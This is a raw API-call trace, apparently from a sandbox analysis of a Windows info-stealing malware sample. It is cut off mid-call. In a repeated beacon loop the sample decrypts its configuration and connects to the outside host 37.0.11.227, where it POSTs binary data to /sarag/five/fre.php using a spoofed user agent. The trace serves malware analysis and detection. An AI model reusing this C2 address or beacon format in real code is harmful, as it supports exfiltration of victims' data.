[0269.712] GetProcessHeap () returned 0x690000 [0269.712] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0269.713] GetProcessHeap () returned 0x690000 [0269.713] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0269.713] GetProcessHeap () returned 0x690000 [0269.713] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0269.733] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15c0) returned 0x80c [0269.734] Sleep (dwMilliseconds=0xea60) [0269.736] GetProcessHeap () returned 0x690000 [0269.736] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0269.737] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.738] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0269.749] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.749] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0269.760] GetProcessHeap () returned 0x690000 [0269.760] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0269.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.763] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0269.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.764] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0269.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.765] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0269.765] GetProcessHeap () returned 0x690000 [0269.765] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0269.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.770] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0269.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.771] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0269.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.772] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0269.772] GetProcessHeap () returned 0x690000 [0269.772] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0269.773] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.773] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0269.774] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.774] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0269.774] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.775] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0269.775] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.775] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0269.776] GetProcessHeap () returned 0x690000 [0269.776] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0269.776] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0269.776] GetProcessHeap () returned 0x690000 [0269.776] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0269.776] GetProcessHeap () returned 0x690000 [0269.777] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0269.777] GetProcessHeap () returned 0x690000 [0269.777] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0269.777] GetProcessHeap () returned 0x690000 [0269.777] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0269.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.778] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0269.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.785] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0269.791] GetProcessHeap () returned 0x690000 [0269.791] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0269.791] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.792] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0269.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.793] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0269.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.795] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0269.795] GetProcessHeap () returned 0x690000 [0269.796] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0269.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.797] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0269.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.834] CryptDestroyKey (hKey=0x69d628) returned 1 [0269.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.835] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0269.835] GetProcessHeap () returned 0x690000 [0269.835] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0269.836] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.836] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0269.837] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.837] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0269.839] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.840] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0269.840] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.841] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0269.841] GetProcessHeap () returned 0x690000 [0269.841] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0269.841] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0269.841] GetProcessHeap () returned 0x690000 [0269.841] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab400 [0269.841] socket (af=2, type=1, protocol=6) returned 0x810 [0269.843] connect (s=0x810, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0269.875] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0269.875] GetProcessHeap () returned 0x690000 [0269.875] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0269.875] GetProcessHeap () returned 0x690000 [0269.875] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0269.876] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0269.877] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0269.877] GetProcessHeap () returned 0x690000 [0269.877] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af5c0 [0269.877] GetProcessHeap () returned 0x690000 [0269.878] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0269.878] GetProcessHeap () returned 0x690000 [0269.878] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0269.878] GetProcessHeap () returned 0x690000 [0269.878] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0269.879] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0269.880] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0269.880] GetProcessHeap () returned 0x690000 [0269.880] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0269.880] GetProcessHeap () returned 0x690000 [0269.880] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0269.880] send (s=0x810, buf=0x6ad508*, len=242, flags=0) returned 242 [0269.881] send (s=0x810, buf=0x6aba40*, len=159, flags=0) returned 159 [0269.881] GetProcessHeap () returned 0x690000 [0269.881] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0269.881] recv (in: s=0x810, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0269.953] GetProcessHeap () returned 0x690000 [0269.953] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0269.955] GetProcessHeap () returned 0x690000 [0269.955] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0269.956] GetProcessHeap () returned 0x690000 [0269.956] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af5c0 | out: hHeap=0x690000) returned 1 [0269.956] GetProcessHeap () returned 0x690000 [0269.956] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0269.956] closesocket (s=0x810) returned 0 [0269.957] GetProcessHeap () returned 0x690000 [0269.957] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab400 | out: hHeap=0x690000) returned 1 [0269.957] GetProcessHeap () returned 0x690000 [0269.958] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0269.958] GetProcessHeap () returned 0x690000 [0269.958] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0269.958] GetProcessHeap () returned 0x690000 [0269.958] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0269.959] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15c4) returned 0x810 [0269.960] Sleep (dwMilliseconds=0xea60) [0269.962] GetProcessHeap () returned 0x690000 [0269.962] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0269.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.963] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0269.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.972] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0269.979] GetProcessHeap () returned 0x690000 [0269.979] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0269.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.980] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0269.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.983] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0269.984] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.984] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0269.984] GetProcessHeap () returned 0x690000 [0269.985] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0269.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.986] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0269.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.987] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0269.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0269.997] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0269.997] GetProcessHeap () returned 0x690000 [0269.997] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0269.999] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0269.999] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0270.008] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.009] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0270.009] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.010] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0270.010] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.011] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0270.011] GetProcessHeap () returned 0x690000 [0270.011] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0270.011] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0270.011] GetProcessHeap () returned 0x690000 [0270.011] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0270.012] GetProcessHeap () returned 0x690000 [0270.012] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0270.012] GetProcessHeap () returned 0x690000 [0270.012] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0270.012] GetProcessHeap () returned 0x690000 [0270.013] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0270.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.014] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0270.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.026] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0270.040] GetProcessHeap () returned 0x690000 [0270.041] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0270.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.042] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0270.043] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.043] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0270.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.044] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0270.044] GetProcessHeap () returned 0x690000 [0270.045] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0270.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.046] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0270.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.048] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0270.048] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.049] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0270.049] GetProcessHeap () returned 0x690000 [0270.049] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0270.050] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.050] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0270.051] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.051] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0270.052] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.053] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0270.054] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.054] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0270.054] GetProcessHeap () returned 0x690000 [0270.054] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0270.054] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0270.054] GetProcessHeap () returned 0x690000 [0270.054] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab490 [0270.054] socket (af=2, type=1, protocol=6) returned 0x814 [0270.057] connect (s=0x814, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0270.089] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0270.089] GetProcessHeap () returned 0x690000 [0270.089] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0270.089] GetProcessHeap () returned 0x690000 [0270.089] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0270.090] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0270.092] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0270.092] GetProcessHeap () returned 0x690000 [0270.092] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afe00 [0270.092] GetProcessHeap () returned 0x690000 [0270.092] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0270.092] GetProcessHeap () returned 0x690000 [0270.092] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0270.092] GetProcessHeap () returned 0x690000 [0270.092] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0270.093] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0270.094] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0270.094] GetProcessHeap () returned 0x690000 [0270.094] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0270.094] GetProcessHeap () returned 0x690000 [0270.094] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0270.094] send (s=0x814, buf=0x6ad508*, len=242, flags=0) returned 242 [0270.095] send (s=0x814, buf=0x6aba40*, len=159, flags=0) returned 159 [0270.095] GetProcessHeap () returned 0x690000 [0270.095] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0270.095] recv (in: s=0x814, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0270.167] GetProcessHeap () returned 0x690000 [0270.168] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0270.168] GetProcessHeap () returned 0x690000 [0270.168] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0270.168] GetProcessHeap () returned 0x690000 [0270.168] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afe00 | out: hHeap=0x690000) returned 1 [0270.169] GetProcessHeap () returned 0x690000 [0270.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0270.170] closesocket (s=0x814) returned 0 [0270.170] GetProcessHeap () returned 0x690000 [0270.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab490 | out: hHeap=0x690000) returned 1 [0270.170] GetProcessHeap () returned 0x690000 [0270.170] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0270.171] GetProcessHeap () returned 0x690000 [0270.171] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0270.171] GetProcessHeap () returned 0x690000 [0270.171] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0270.171] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15c8) returned 0x814 [0270.176] Sleep (dwMilliseconds=0xea60) [0270.177] GetProcessHeap () returned 0x690000 [0270.177] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0270.178] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.179] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0270.188] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.189] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: 